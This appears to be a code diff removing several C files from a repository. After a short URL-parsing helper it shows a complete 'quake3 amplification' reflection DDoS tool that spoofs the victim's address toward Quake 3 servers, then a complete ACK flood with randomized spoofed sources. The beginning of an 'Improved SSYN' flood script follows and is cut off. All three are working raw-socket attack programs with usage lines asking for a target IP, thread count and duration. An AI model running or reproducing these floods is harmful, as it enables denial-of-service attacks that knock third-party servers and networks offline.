if(returnparts[0]!=NULL) { free(returnparts[0]); }
|
|
||||||
if(returnparts[1]!=NULL) { free(returnparts[1]); }
|
|
||||||
if(returnparts[2]!=NULL) { free(returnparts[2]); }
|
|
||||||
if(returnparts[3]!=NULL) { free(returnparts[3]); }
|
|
||||||
if(returnparts[4]!=NULL) { free(returnparts[4]); }
|
|
||||||
if(returnparts[5]!=NULL) { free(returnparts[5]); }
|
|
||||||
if(returnparts[6]!=NULL) { free(returnparts[6]); }
|
|
||||||
if(returnparts[7]!=NULL) { free(returnparts[7]); }
|
|
||||||
/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
void setupparts()
|
|
||||||
{
|
|
||||||
returnparts[0] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[1] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[2] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[3] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[4] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[5] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[6] = malloc(sizeof(struct urlparts));
|
|
||||||
returnparts[7] = malloc(sizeof(struct urlparts));
|
|
||||||
/*returnparts[8] = malloc(sizeof(struct urlparts));*/
|
|
||||||
bzero(returnparts[0], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[1], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[2], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[3], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[4], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[5], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[6], sizeof(struct urlparts));
|
|
||||||
bzero(returnparts[7], sizeof(struct urlparts));
|
|
||||||
/*bzero(returnparts[8], sizeof(struct urlparts));*/
|
|
||||||
returnparts[0]->name = "scheme";
|
|
||||||
strcpy(returnparts[0]->separator, ":");
|
|
||||||
returnparts[1]->name = "userid";
|
|
||||||
strcpy(returnparts[1]->separator, "@");
|
|
||||||
returnparts[2]->name = "password";
|
|
||||||
strcpy(returnparts[2]->separator, ":");
|
|
||||||
returnparts[3]->name = "host";
|
|
||||||
strcpy(returnparts[3]->separator, "//");
|
|
||||||
returnparts[4]->name = "port";
|
|
||||||
strcpy(returnparts[4]->separator, ":");
|
|
||||||
returnparts[5]->name = "path";
|
|
||||||
strcpy(returnparts[5]->separator, "/");
|
|
||||||
returnparts[6]->name = "param";
|
|
||||||
strcpy(returnparts[6]->separator, ";");
|
|
||||||
/*returnparts[7]->name = "query";
|
|
||||||
strcpy(returnparts[7]->separator, "?");*/
|
|
||||||
returnparts[7]->name = "fragment";
|
|
||||||
strcpy(returnparts[7]->separator, "#");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
int parseURL(char *url, struct urlparts **returnpart) {
|
|
||||||
register i;
|
|
||||||
int seplen;
|
|
||||||
char * remainder;
|
|
||||||
//char * regall = ":/;?#";
|
|
||||||
char * regall = ":/;#";
|
|
||||||
//char * regpath = ":;?#";
|
|
||||||
char * regpath = ":;#";
|
|
||||||
char * regx;
|
|
||||||
if(!*url)
|
|
||||||
{
|
|
||||||
strcpy(parseError, "nothing to do!\n");
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
if((remainder = malloc(strlen(url) + 1)) == NULL)
|
|
||||||
{
|
|
||||||
printf("cannot allocate memory\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
strcpy(remainder, url);
|
|
||||||
if(firstpunc(remainder) == ':')
|
|
||||||
{
|
|
||||||
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
}
|
|
||||||
if (!strcmp(returnpart[scheme]->value, "mailto"))
|
|
||||||
*(returnpart[host]->separator) = 0;
|
|
||||||
for(i = 0; i < NUMPARTS; i++)
|
|
||||||
{
|
|
||||||
if(!*remainder)
|
|
||||||
break;
|
|
||||||
if(i == scheme || i == userid || i == password)
|
|
||||||
continue;
|
|
||||||
if(i == host && strchr(remainder, '@'))
|
|
||||||
{
|
|
||||||
if(!strncmp(remainder, "//", 2))
|
|
||||||
strleft(remainder, 2);
|
|
||||||
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
if(strchr(remainder, '@'))
|
|
||||||
{
|
|
||||||
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
|
|
||||||
strleft(remainder, 1);
|
|
||||||
}
|
|
||||||
*(returnpart[host]->separator) = 0;
|
|
||||||
}
|
|
||||||
if(i == path && (! *(returnpart[scheme]->value)))
|
|
||||||
{
|
|
||||||
*(returnpart[path]->separator) = 0;
|
|
||||||
strcpy(returnpart[scheme]->value, "http");
|
|
||||||
}
|
|
||||||
regx = (i == path) ? regpath : regall ;
|
|
||||||
seplen = strlen(returnpart[i]->separator);
|
|
||||||
if(strncmp(remainder, returnpart[i]->separator, seplen))
|
|
||||||
continue;
|
|
||||||
else
|
|
||||||
strleft(remainder, seplen);
|
|
||||||
strcpy(returnpart[i]->value, strsplit(remainder, regx));
|
|
||||||
}
|
|
||||||
if(*remainder)
|
|
||||||
sprintf(parseError, "I don't understand '%s'", remainder);
|
|
||||||
free(remainder);
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
char *str_replace(char *orig, char *rep, char *with) {
|
|
||||||
char *result;
|
|
||||||
char *ins;
|
|
||||||
char *tmp;
|
|
||||||
int len_rep;
|
|
||||||
int len_with;
|
|
||||||
int len_front;
|
|
||||||
int count;
|
|
||||||
if (!orig)
|
|
||||||
return NULL;
|
|
||||||
if (!rep || !(len_rep = strlen(rep)))
|
|
||||||
return NULL;
|
|
||||||
if (!(ins = strstr(orig, rep)))
|
|
||||||
return NULL;
|
|
||||||
if (!with)
|
|
||||||
with = "";
|
|
||||||
len_with = strlen(with);
|
|
||||||
for (count = 0; tmp = strstr(ins, rep); ++count) {
|
|
||||||
ins = tmp + len_rep;
|
|
||||||
}
|
|
||||||
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
|
||||||
if (!result)
|
|
||||||
return NULL;
|
|
||||||
while (count--) {
|
|
||||||
ins = strstr(orig, rep);
|
|
||||||
len_front = ins - orig;
|
|
||||||
tmp = strncpy(tmp, orig, len_front) + len_front;
|
|
||||||
tmp = strcpy(tmp, with) + len_with;
|
|
||||||
orig += len_front + len_rep;
|
|
||||||
}
|
|
||||||
strcpy(tmp, orig);
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
char *stristr(const char *String, const char *Pattern)
|
|
||||||
{
|
|
||||||
char *pptr, *sptr, *start;
|
|
||||||
uint slen, plen;
|
|
||||||
for (start = (char *)String,
|
|
||||||
pptr = (char *)Pattern,
|
|
||||||
slen = strlen(String),
|
|
||||||
plen = strlen(Pattern);
|
|
||||||
slen >= plen;
|
|
||||||
start++, slen--)
|
|
||||||
{
|
|
||||||
|
|
||||||
while (toupper(*start) != toupper(*Pattern))
|
|
||||||
{
|
|
||||||
start++;
|
|
||||||
slen--;
|
|
||||||
|
|
||||||
if (slen < plen)
|
|
||||||
return(NULL);
|
|
||||||
}
|
|
||||||
sptr = start;
|
|
||||||
pptr = (char *)Pattern;
|
|
||||||
while (toupper(*sptr) == toupper(*pptr))
|
|
||||||
{
|
|
||||||
sptr++;
|
|
||||||
pptr++;
|
|
||||||
|
|
||||||
if ('\0' == *pptr)
|
|
||||||
return (start);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return(NULL);
|
|
||||||
}
|
|
||||||
char * strsplit(char * s, char * tok) {
|
|
||||||
#define OUTLEN (255)
|
|
||||||
register i, j;
|
|
||||||
static char out[OUTLEN + 1];
|
|
||||||
for(i = 0; s[i] && i < OUTLEN; i++)
|
|
||||||
{
|
|
||||||
if(strchr(tok, s[i]))
|
|
||||||
break;
|
|
||||||
else
|
|
||||||
out[i] = s[i];
|
|
||||||
}
|
|
||||||
out[i] = 0;
|
|
||||||
if(i && s[i])
|
|
||||||
{
|
|
||||||
for(j = 0; s[i]; i++, j++) s[j] = s[i];
|
|
||||||
s[j] = 0;
|
|
||||||
}
|
|
||||||
else if (!s[i])
|
|
||||||
*s = 0;
|
|
||||||
return out;
|
|
||||||
}
|
|
||||||
char firstpunc(char * s) {
|
|
||||||
while(*s++)
|
|
||||||
if(!isalnum(*s)) return *s;
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
int strleft(char * s, int n) {
|
|
||||||
int l;
|
|
||||||
l = strlen(s);
|
|
||||||
if(l < n)
|
|
||||||
return -1;
|
|
||||||
else if (l == n)
|
|
||||||
*s = 0;
|
|
||||||
memmove(s, s + n, l - n + 1);
|
|
||||||
return n;
|
|
||||||
}
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -1,210 +0,0 @@
|
|||||||
/* quake3 amplification script */
|
|
||||||
|
|
||||||
#include <time.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/udp.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 8192
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static uint32_t Q[4096], c = 362436;
|
|
||||||
struct list
|
|
||||||
{
|
|
||||||
struct sockaddr_in data;
|
|
||||||
struct list *next;
|
|
||||||
struct list *prev;
|
|
||||||
};
|
|
||||||
struct list *head;
|
|
||||||
volatile int tehport;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
|
||||||
void init_rand(uint32_t x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++)
|
|
||||||
{
|
|
||||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
uint32_t rand_cmwc(void)
|
|
||||||
{
|
|
||||||
uint64_t t, a = 18782LL;
|
|
||||||
static uint32_t i = 4095;
|
|
||||||
uint32_t x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int nwords)
|
|
||||||
{
|
|
||||||
unsigned long sum = 0;
|
|
||||||
for (sum = 0; nwords > 0; nwords--)
|
|
||||||
sum += *buf++;
|
|
||||||
sum = (sum >> 16) + (sum & 0xffff);
|
|
||||||
sum += (sum >> 16);
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = IPPROTO_UDP;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
void setup_udp_header(struct udphdr *udph)
|
|
||||||
{
|
|
||||||
udph->source = htons(5678);
|
|
||||||
udph->dest = htons(27960);
|
|
||||||
udph->check = 0;
|
|
||||||
memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
|
|
||||||
udph->len=htons(sizeof(struct udphdr) + 14);
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
struct thread_data *td = (struct thread_data *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin = td->sin;
|
|
||||||
struct list *list_node = td->list_node;
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_udp_header(udph);
|
|
||||||
udph->source = htons(rand() % 65535 - 1026);
|
|
||||||
iph->saddr = sin.sin_addr.s_addr;
|
|
||||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
|
||||||
list_node = list_node->next;
|
|
||||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
srand(time(NULL));
|
|
||||||
int i = 0;
|
|
||||||
head = NULL;
|
|
||||||
fprintf(stdout, "Setting up sockets...\n");
|
|
||||||
int max_len = 128;
|
|
||||||
char *buffer = (char *) malloc(max_len);
|
|
||||||
buffer = memset(buffer, 0x00, max_len);
|
|
||||||
int num_threads = atoi(argv[4]);
|
|
||||||
int maxpps = atoi(argv[5]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
int multiplier = 20;
|
|
||||||
FILE *list_fd = fopen(argv[3], "r");
|
|
||||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
|
||||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
|
||||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
|
||||||
buffer[strlen(buffer) - 1] = 0x00;
|
|
||||||
if(head == NULL)
|
|
||||||
{
|
|
||||||
head = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(&head->data, sizeof(head->data));
|
|
||||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
|
||||||
head->next = head;
|
|
||||||
head->prev = head;
|
|
||||||
} else {
|
|
||||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
|
||||||
memset(new_node, 0x00, sizeof(struct list));
|
|
||||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
|
||||||
new_node->prev = head;
|
|
||||||
new_node->next = head->next;
|
|
||||||
head->next = new_node;
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
} else {
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
struct list *current = head->next;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
|
||||||
struct thread_data td[num_threads];
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
td[i].thread_id = i;
|
|
||||||
td[i].sin= sin;
|
|
||||||
td[i].list_node = current;
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
File diff suppressed because it is too large
Load Diff
@ -1,216 +0,0 @@
|
|||||||
/*
|
|
||||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
|
|
||||||
#define MAX_PACKET_SIZE 65534
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = rand();
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = rand();
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->ack = 1;
|
|
||||||
tcph->window = htons(65535);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = rand();
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = rand();
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Improper ACK flood parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 100;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -1,217 +0,0 @@
|
|||||||
// Improved SSYN Script - random ports, random flags. by SPAI3N.
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <time.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
